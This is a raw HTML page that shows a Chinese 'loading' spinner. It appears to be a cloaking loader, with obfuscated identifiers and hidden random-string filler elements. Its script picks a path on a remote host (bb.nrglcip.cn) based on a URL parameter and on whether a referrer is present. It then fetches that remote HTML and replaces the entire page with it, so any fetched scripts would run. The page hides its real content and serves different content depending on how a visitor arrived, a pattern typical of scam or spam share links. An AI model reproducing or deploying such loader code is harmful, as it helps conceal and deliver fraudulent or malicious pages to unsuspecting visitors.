<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .zdCvhdMA3 {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .zdCvhdMA3 .moJK82HQU0 {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .zdCvhdMA3 .content {
            line-height: 50px;
            text-align: center
        }

        .zdCvhdMA3 .img {
            width: 100%
        }

        .zdCvhdMA3 .EmJkBW {
            text-align: center
        }

        .zdCvhdMA3 .EmJkBW span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .zdCvhdMA3 .EmJkBW span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .zdCvhdMA3 .EmJkBW span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .zdCvhdMA3 .EmJkBW span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .zdCvhdMA3 .EmJkBW span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .zdCvhdMA3 .EmJkBW span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .zdCvhdMA3 .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function QPRL2QHyaZ(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var VnJcJ = QPRL2QHyaZ('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ VnJcJ +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ VnJcJ +".html?a=share";
		}
		
        EkGRl4YuK=url+"#"+new Date().getTime();
        EkGRl4YuK && function() {
            $.get(EkGRl4YuK, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<div style='display:none'>Xpkh9b559zNLb0NDCkZWixkN5</div>
<b style='display:none' >C3coKuQvk9xxV97yF6IBEQeU9l8abCgSbH0Z0mVDJrroMwZWQoAxfFzRrCuS2SjRkuL2KFapJWQna7</b>
<img  src='' style='display:none'>
<h1 style='display:none' >R2eg7VqJPEtDpOUBuQ7YxgCxZz</h1>
<b style='display:none' >C3coKuQvk9xxV97yF6IBEQeU9l8abCgSbH0Z0mVDJrroMwZWQoAxfFzRrCuS2SjRkuL2KFapJWQna7</b>
<span style='display:none'>vZCxzPGe0uv</span><div class="zdCvhdMA3">
    <div class="moJK82HQU0">
        <div class="EmJkBW">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<img  src='' style='display:none'>
<img  src='' style='display:none'>
<b style='display:none' >w2Wa9dUw8Z8k5D3PD</b>
<b style='display:none' >w2Wa9dUw8Z8k5D3PD</b></body>
</html>